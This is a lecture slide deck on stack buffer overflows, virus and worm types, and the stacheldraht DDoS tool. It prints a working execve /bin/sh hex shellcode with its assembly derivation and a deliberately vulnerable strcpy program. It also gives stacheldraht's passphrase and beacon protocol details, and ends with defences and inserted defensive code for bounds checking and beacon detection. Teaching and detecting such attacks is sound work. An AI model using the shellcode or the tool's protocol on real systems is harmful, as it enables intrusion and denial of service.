Buffer Overflow Exploits
By Hon Ching Lo

Uploaded by er-umesh-thoriya, posted 06-Dec-2015


Page 1: Buffer Overflow

Exploits
By Hon Ching Lo

Page 2: Buffer Overflow

1. Buffer Overflow

2. Virus & Worms

3. The “stacheldraht” distributed denial of service attack tool

Page 3: Buffer Overflow

Stack Buffer Overflow Basics

A process in memory:

- text (program code; marked read-only, so any attempt to write to it will result in a segmentation fault)
- data segment (global and static variables)
- stack (dynamic variables)

The process is blocked and is rescheduled to run again with a larger memory space if the user stack exhausts available memory.

[Figure: process memory layout, from lower memory addresses to higher memory addresses]

Page 4: Buffer Overflow

Stack Basics

A stack is a contiguous block of memory containing data.

Stack pointer (SP) – a register that points to the top of the stack.

The bottom of the stack is at a fixed address. Its size is dynamically adjusted by the kernel at run time.

The CPU implements instructions to PUSH onto and POP off the stack.

Page 5: Buffer Overflow

Stack Basics

A stack consists of logical stack frames that are pushed when calling a function and popped when returning.

Frame pointer (FP) – points to a fixed location within a frame.

When a function is called, the return address, stack frame pointer and the variables are pushed on the stack (in that order).

So the return address has a higher address than the buffer.

When we overflow the buffer, the return address will be overwritten.

[Figure: stack frame layout, from higher memory addresses to lower memory addresses]

Page 6: Buffer Overflow

void function() {
    /* ... */
    return;
}

int main() {
    /* ... */
    function();
    /* ... */
    return 0;
}

Page 7: Buffer Overflow

Another Example Code

void function(int a, int b, int c) {
    char buffer1[5];
    char buffer2[10];
}

int main() {
    function(1, 2, 3);
    return 0;
}

Page 8: Buffer Overflow

Stack layout for the example code

bottom of                                                            top of
memory                                                               memory
                       buffer2       buffer1   sfp   ret   a     b     c
<------                [            ][        ][    ][    ][    ][    ][    ]

top of                                                            bottom of
stack                                                                 stack

Page 9: Buffer Overflow

The general form of a security attack achieves two goals:

1. Inject the attack code, which is typically a small sequence of instructions that spawns a shell, into a running process.

2. Change the execution path of the running process to execute the attack code.

Overflowing stack buffers can achieve both goals simultaneously.

Page 10: Buffer Overflow

How can we place arbitrary instructions into its address space?

- Place the code that you are trying to execute in the buffer we are overflowing, and overwrite the return address so it points back into the buffer.

Page 11: Buffer Overflow

We want:

bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c
<------   [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]
           ^                            |
           |____________________________|

top of                                                            bottom of
stack                                                                 stack

Page 12: Buffer Overflow

(i) Before the attack (ii) after injecting the attack code

Page 13: Buffer Overflow

(iii) executing the attack code

Page 14: Buffer Overflow

shellcode.c

#include <stdio.h>
#include <unistd.h>   /* execve */

int main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    return 0;
}

Page 15: Buffer Overflow

After compiling the code and starting up gdb, we have the shellcode in assembly:

Page 16: Buffer Overflow

Some modifications to the shellcode:

We want the program to exit cleanly if the execve syscall fails. We add exit(0); as the last line in the code.

Page 17: Buffer Overflow

Our list of steps:

- Have the null terminated string "/bin/sh" somewhere in memory.
- Have the address of the string "/bin/sh" somewhere in memory followed by a null long word.
- Copy 0xb into the EAX register.
- Copy the address of the address of the string "/bin/sh" into the EBX register.
- Copy the address of the string "/bin/sh" into the ECX register.
- Copy the address of the null long word into the EDX register.
- Execute the int $0x80 instruction.
- Copy 0x1 into the EAX register.
- Copy 0x0 into the EBX register.
- Execute the int $0x80 instruction.

Trying to put this together in assembly language, we have:

    movl string_addr,string_addr_addr
    movb $0x0,null_byte_addr
    movl $0x0,null_addr
    movl $0xb,%eax
    movl string_addr,%ebx
    leal string_addr,%ecx
    leal null_string,%edx
    int  $0x80
    movl $0x1, %eax
    movl $0x0, %ebx
    int  $0x80
    /bin/sh string goes here.

Then, place the string after the code.

Page 18: Buffer Overflow

Problem:

We don't know where, in the memory space of the program we're trying to exploit, the code (and the string that follows it) will be placed.

Solution:

- Place a CALL instruction right before the "/bin/sh" string, and a JMP instruction to it.

- The string's address will be pushed onto the stack as the return address when the CALL is executed (basically, the CALL instruction pushes the IP onto the stack).

Page 19: Buffer Overflow

Inserting JMP and CALL instructions

bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c
<------   [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
           ^|^             ^|           |
           |||______________|           |   (3)
           ||______________|            |   (2)
           |____________________________|   (1)

(1) the overwritten return address points at the JMP at the start of the buffer
(2) the JMP jumps forward to the CALL placed right before the "/bin/sh" string
(3) the CALL pushes the string's address and jumps back to the shellcode after the JMP

top of                                                            bottom of
stack                                                                 stack

Page 20: Buffer Overflow

Running the shellcode

We must place the code we wish to execute in the stack or data segment. (Recall: the text region of a process is marked read-only.)

To do so, we'll place our code in a global array in the data segment. We need the hex representation of the binary code.

Page 21: Buffer Overflow

shellcodeasm.c

Page 22: Buffer Overflow
Page 23: Buffer Overflow

Obstacle: there must be no null bytes in the shellcode for the exploit to work.
Reason: null bytes in our shellcode will be considered the end of the string, so the copy will be terminated when it encounters the null character.

After eliminating null bytes, the shellcode in hex representation (note: different hardware architectures have different hex representations of the binary code):

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

Page 24: Buffer Overflow

vulnerable.c

#include <string.h>

int main(int argc, char *argv[]) {
    char buffer[512];
    if (argc > 1)
        strcpy(buffer, argv[1]);   /* no length check: argv[1] longer than 511 bytes overwrites the stack */
    return 0;
}
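As an added example (not code from the slides), here is vulnerable.c rewritten so that the copy into the 512-byte buffer is bounds-checked and oversized input is rejected rather than written past the end of the array; the names bounded_copy, process_arg and make_input are chosen here, and the test inputs are constructed inline.

```c
#include <stdio.h>
#include <string.h>

/* Copy src into dst only if it fits together with its NUL terminator.
 * Returns 0 on success and -1 if src would overflow dst; dst is untouched
 * on failure. (strncpy alone is not enough: it leaves dst unterminated
 * when src is too long.) */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0 || n >= dstsz)      /* n == dstsz leaves no room for '\0' */
        return -1;
    memcpy(dst, src, n + 1);           /* copies the terminator as well */
    return 0;
}

/* Same job as vulnerable.c's main, but oversized input is refused instead
 * of overwriting sfp and ret. Returns 0 if accepted, 1 if rejected. */
int process_arg(const char *arg)
{
    char buffer[512];
    if (bounded_copy(buffer, sizeof buffer, arg) != 0) {
        fprintf(stderr, "input too long: %zu bytes, limit %zu\n",
                strlen(arg), sizeof buffer - 1);
        return 1;
    }
    printf("accepted %zu bytes\n", strlen(buffer));
    return 0;
}

/* Constructed test input: a string of n 'A' characters (capped at 1023). */
const char *make_input(size_t n)
{
    static char buf[1024];
    if (n >= sizeof buf)
        n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

int main(int argc, char *argv[])
{
    if (argc > 1)
        return process_arg(argv[1]);
    /* no argument given: demonstrate with constructed inputs */
    process_arg(make_input(511));   /* fits: 511 chars plus terminator */
    process_arg(make_input(600));   /* would overflow vulnerable.c: rejected here */
    return 0;
}
```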

Page 25: Buffer Overflow

Computer Viruses and Worms

Page 26: Buffer Overflow

Computer viruses - parasitic programs which are designed to alter the way a computer operates without the permission or knowledge of the user.

- must meet two criteria:
  - must execute itself; it will often place its own code in the path of execution of another program.
  - must replicate itself.
- require an infected host file, but worms don't.
- they incorporate themselves within executable program files.
- some infect data files such as MS-Word and MS-Excel documents (because strings of program commands, called "macros", can be put in the data files).
- some attach themselves to boot records.
- they infect files until the payload is triggered.

Page 27: Buffer Overflow

Components:

- replication mechanism: allows the virus to copy itself
- protection mechanism: hides the virus from detection
- the trigger: sets off the payload
- the payload: the effect of the virus

Effects:

Damage programs by corrupting data with or without a pattern, deleting files, or reformatting the hard disk.

Replicate themselves and present text, video, and audio messages.

This may cause system crashes and data loss since they take up computer memory used by legitimate programs.

Page 28: Buffer Overflow

Types of viruses:

File infector

- infects program files: infects executable code (like .com and .exe files).
- usually appends the virus code to the file and hides itself.
- they're memory resident (any non-infected executable that runs becomes infected after memory becomes infected).

[e.g. Jerusalem and Cascade]

Macro virus

- a small macro written to annoy people and infect data files. It makes use of another program's internal programming language, which was created to allow users to automate certain tasks within the program.

[e.g. W97M.Melissa, WM.NiceDay and W97M.Groov]

Page 29: Buffer Overflow

Types of Virus cont'

Boot sector

- infects the system area of a disk, which is the boot record on floppy disks and hard disks.
- the most common type of virus, and cannot normally spread across a network.
- targets all PCs.
- activated when the user attempts to start up from the infected disk.
- usually spread by accident via floppy disks, new software, newly repaired hardware etc.

[e.g. Form, Disk Killer, Michelangelo and Stoned]

Master boot record

- memory resident viruses that infect disks in the same manner as boot sector viruses.
- master boot record infectors save a legitimate copy of the master boot record in a different location.
- different operating systems access their boot information differently.
- if Windows NT is formatted with FAT partitions, the virus could be removed by booting to DOS and using antivirus software.
- if the boot partition is NTFS, the system must be recovered by using the 3 Windows NT setup disks.

[e.g. the master boot record infectors NYB, AntiExe and Unashamed :p ]

Page 30: Buffer Overflow

Types of Virus cont'

Multipartite viruses (polypartite)

- infect both boot sectors and program files.
- particularly difficult to repair.
- if the boot sectors are not disinfected, clean files will be reinfected, and vice versa.

[e.g. One_Half, Emperor, Anthrax and Tequila]

Some sites consider the following types of virus:

Trojan horse - a program that is designed to cause damage or compromise the security of your system. It doesn't replicate itself. [e.g. PWSteal.Trojan, which is NOT the name of a virus]

Worm - a program that replicates itself from system to system WITHOUT the use of a host file. [e.g. PrettyPark.Worm]

Page 31: Buffer Overflow

Computer Virus vs Worm

Viruses are designed to spread themselves from one file to another on a computer. [depend on human aid]

Worms are designed to spread themselves from one computer to another over a network (e.g. by using email). [don't need help from a human being]

Page 32: Buffer Overflow

Worms:

- spread easily: they can replicate themselves without attaching to other programs
- deceiving: trick people into thinking that they're a benign attachment (often in emails)
- damaging: rename and hide your files, or keep the filename and path but overwrite the data; deleted files cannot be retrieved once they have been overwritten
- easy to create

Page 33: Buffer Overflow

What do worms do?

- replicate themselves.
- if they have a payload (a destructive sequence activated on a certain trigger; the trigger may be the arrival of particular data or an action by the user), they may display a text message to warn you, or they may even rename and overwrite all the files on your hard drive.
- consume system resources (e.g. change file sizes, report incorrect RAM).
- create back doors into your systems, allowing unauthorized access.
- steal password and file information.
- consume network resources (example: the ILOVEYOU worm sent itself out at scheduled intervals).

Page 34: Buffer Overflow

The “stacheldraht” distributed denial of service attack tool

Page 35: Buffer Overflow

Distributed Denial of Service (DDoS)

It consists of a two-phase attack:

1. Mass-intrusion phase, in which automated tools are used to remotely root-compromise large numbers of systems (i.e., in the several hundred to several thousand range) and the distributed denial of service agents are installed on these compromised systems. These are the primary victims (of system compromise).

Page 36: Buffer Overflow

DDoS cont' – 2nd phase of attack

2. The actual denial of service attack phase, in which these compromised systems, which constitute the handlers and agents of the distributed attack network, are used to wage massive denial of service attacks against one or more sites. These are the secondary victims (of denial of service).

Page 37: Buffer Overflow

The network: client(s) -> handlers -> agent(s) -> victims

http://staff.washington.edu/dittrich/misc/stacheldraht.analysis.txt

Page 38: Buffer Overflow

The stacheldraht network

The attacker(s) control one or more handlers using encrypting clients.

Each handler can control many agents. (There is an internal limit in the "mserv.c" code of 1000 agents.)

The agents are all instructed by the handler (referred to as an "mserver" or "master server" in the code) to coordinate a packet-based attack against one or more victim systems.

Page 39: Buffer Overflow

Communication

Stacheldraht uses TCP and ICMP for handlers and agents to communicate with each other.

Remote control of a stacheldraht network is accomplished using a simple client that uses symmetric key encryption for communication between itself and the handler.

The client accepts a single argument, the address of the handler to which it should connect. It then connects using a TCP port (default 16660/tcp in the analyzed code).

Page 40: Buffer Overflow

The attacker sees the following:

    -------------------------------------------------------------------------
    # ./client 192.168.0.1
    [*] stacheldraht [*] (c) in 1999 by ...
    trying to connect...
    connection established.
    --------------------------------------
    enter the passphrase : sicken
    --------------------------------------
    entering interactive session.
    ******************************
    welcome to stacheldraht
    ******************************
    type .help if you are lame
    stacheldraht(status: a!1 d!0)>
    ---------------------------------------------------------------------------

Page 41: Buffer Overflow

Some characteristics of stacheldraht

Strings are embedded in the encrypting client ("client"), the handler ("mserv") and the agent ("td").

It employs the Berkeley "rcp" command (514/tcp), using a stolen account at some site as a cache. On demand, all agents are instructed to delete the current program image, go out and get a new copy (either a Linux- or Solaris-specific binary) from a site/account using "rcp", start running this new image with "nohup", and then exit.

Page 42: Buffer Overflow

What do agents do?

Finding an active handler:

When each agent starts up, it attempts to read a master server configuration file to learn which handler(s) may control it.

It then starts at the beginning of the list of handlers and sends an ICMP_ECHOREPLY packet with an ID field containing the value 666 and a data field containing the string "skillz". If the master gets this packet, it sends back an ICMP_ECHOREPLY packet with an ID field containing the value 667 and a data field containing the string "ficken".

The handler and agent continue periodically sending these 666|skillz / 667|ficken packets back and forth.

Page 43: Buffer Overflow

What do agents do?

The agent performs a test to see if the network on which the agent is running allows packets to exit with forged source addresses.

It does this by sending out an ICMP ECHO packet with a forged source IP address of "3.3.3.3", an ID of 666, and the IP address of the agent system (obtained by getting the hostname, then resolving this to an IP address) in the data field of the ICMP packet.

Page 44: Buffer Overflow

What do agents do?

If the master receives this packet, it replies to the IP address embedded in the packet with an ICMP_ECHOREPLY packet containing an ID of 1000 and the word "spoofworks" in the data field.

If the agent receives this packet, it sets a spoof_level of 0 (can spoof all 32 bits of the IP address). If it times out before receiving a spoof reply packet, it sets a spoof_level of 3 (can only spoof the final octet).

Page 45: Buffer Overflow

What do agents do?

There is also code in the agent to perform an ID test, sending an ICMP_ECHOREPLY packet with an ID field value of 669 and the string "sicken\n" in the data field.

This code is triggered if the agent is sent an ICMP_ECHOREPLY packet with an ID field containing the value 668.

Page 46: Buffer Overflow

Defenses

Because the programs use ICMP_ECHOREPLY packets for communication, it will be very difficult (if not impossible) to block it without breaking most Internet programs that rely on ICMP.

The Phrack paper on LOKI states: "The only sure way to destroy this channel is to deny ALL ICMP_ECHO traffic into your network."

Short of rejecting this traffic, it will instead be necessary to observe the difference between "normal" use of ICMP_ECHO and ICMP_ECHOREPLY packets by programs like "ping". This will not be an easy task, especially on large networks.

Page 47: Buffer Overflow

Weaknesses

1. If the source has not been modified, you can identify stacheldraht clients/handlers/agents by the embedded strings shown earlier.

2. Monitoring "rcp" connections (514/tcp) from multiple systems on your network, in quick succession, to a single IP address outside your network would be a good trigger.

3. Watch for the forged address 3.3.3.3 to show up in the source address of outgoing unsolicited ICMP_ECHOREPLY packets.

4. Observe these strings in the data portion of ICMP packets using programs like "ngrep".

Page 48: Buffer Overflow

Weaknesses

If the command values have not been changed from the default, as few as just one packet would be necessary to flush out an agent. Either:

a) send an ICMP_ECHOREPLY packet with an ID field value of 668 and watch for an ICMP_ECHOREPLY packet to come back with an ID field value of 669 and the string "sicken\n" in the data field, or

b) send an ICMP_ECHOREPLY packet with a source address of "3.3.3.3" (and an ID value of 666 and a data field with "skillz" if you want to go all out) and watch for an ICMP_ECHOREPLY packet to come back with an ID field value of 1000 and the string "spoofworks" in the data field.
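As an added example (not from the slides or from Dittrich's analysis), the following C classifier implements the passive side of weaknesses 3 and 4 and of the handler-finding, spoof-test and ID-test exchanges described above: given a captured ICMP echo-reply it matches the ID field and data string against the default values 666/"skillz", 667/"ficken", 668, 669/"sicken\n" and 1000/"spoofworks". The slides do not say which byte order the tool writes the ID in, so both readings are compared; the function names and the sample packets are constructed here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* RFC 792 echo / echo-reply header: type(1) code(1) checksum(2) id(2) seq(2) */
#define ICMP_HDR_LEN   8
#define ICMP_ECHOREPLY 0

struct beacon_sig {
    uint16_t    id;       /* default ID value used by the tool (from the slides) */
    const char *data;     /* expected start of the data field; "" = match on ID alone */
    const char *meaning;
};

/* Default stacheldraht beacon values as listed on the slides */
static const struct beacon_sig sigs[] = {
    { 666,  "skillz",     "agent->handler beacon (or spoof test)" },
    { 667,  "ficken",     "handler->agent beacon reply" },
    { 668,  "",           "handler->agent ID-test trigger" },
    { 669,  "sicken\n",   "agent ID-test reply" },
    { 1000, "spoofworks", "handler spoof-test reply" },
};

static uint16_t rd16_be(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint16_t rd16_le(const uint8_t *p) { return (uint16_t)((p[1] << 8) | p[0]); }

/* Classify one ICMP message (header plus data, IP header already stripped).
 * Returns the matched beacon's description, or NULL for ordinary traffic.
 * Assumption (not stated on the slides): the tool may write the ID in either
 * byte order, so both readings are compared; the data-string check keeps an
 * ordinary ping whose ID happens to collide from being flagged. */
const char *classify_icmp(const uint8_t *icmp, size_t len)
{
    if (len < ICMP_HDR_LEN || icmp[0] != ICMP_ECHOREPLY)
        return NULL;
    uint16_t id_be = rd16_be(icmp + 4), id_le = rd16_le(icmp + 4);
    const uint8_t *data = icmp + ICMP_HDR_LEN;
    size_t dlen = len - ICMP_HDR_LEN;

    for (size_t i = 0; i < sizeof sigs / sizeof sigs[0]; i++) {
        if (sigs[i].id != id_be && sigs[i].id != id_le)
            continue;
        size_t n = strlen(sigs[i].data);
        if (n == 0 || (dlen >= n && memcmp(data, sigs[i].data, n) == 0))
            return sigs[i].meaning;
    }
    return NULL;
}

/* Weakness 3: an outgoing echo packet whose source address is the forged
 * "3.3.3.3" is the agent's spoof test. Returns 1 if src_ip matches. */
int is_spoof_test_source(const char *src_ip)
{
    return strcmp(src_ip, "3.3.3.3") == 0;
}

/* Build a constructed ICMP message (checksum left zero, ID stored big-endian)
 * so the classifier can be exercised offline. Returns the total length. */
size_t build_icmp(uint8_t *buf, size_t cap, uint8_t type, uint16_t id, const char *payload)
{
    size_t n = strlen(payload);
    if (cap < ICMP_HDR_LEN + n)
        return 0;
    memset(buf, 0, ICMP_HDR_LEN);
    buf[0] = type;
    buf[4] = (uint8_t)(id >> 8);
    buf[5] = (uint8_t)(id & 0xff);
    memcpy(buf + ICMP_HDR_LEN, payload, n);
    return ICMP_HDR_LEN + n;
}

/* Convenience wrapper: build a constructed packet and classify it. */
const char *classify_sample(uint8_t type, uint16_t id, const char *payload)
{
    static uint8_t buf[128];
    size_t n = build_icmp(buf, sizeof buf, type, id, payload);
    return n ? classify_icmp(buf, n) : NULL;
}

int main(void)
{
    const char *v;
    v = classify_sample(0, 666, "skillz");        /* constructed agent beacon */
    printf("ID 666 / \"skillz\"  -> %s\n", v ? v : "no match");
    v = classify_sample(0, 0x1234, "ping payload"); /* constructed ordinary ping reply */
    printf("ID 0x1234 / ping   -> %s\n", v ? v : "no match");
    return 0;
}
```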

Page 49: Buffer Overflow

The End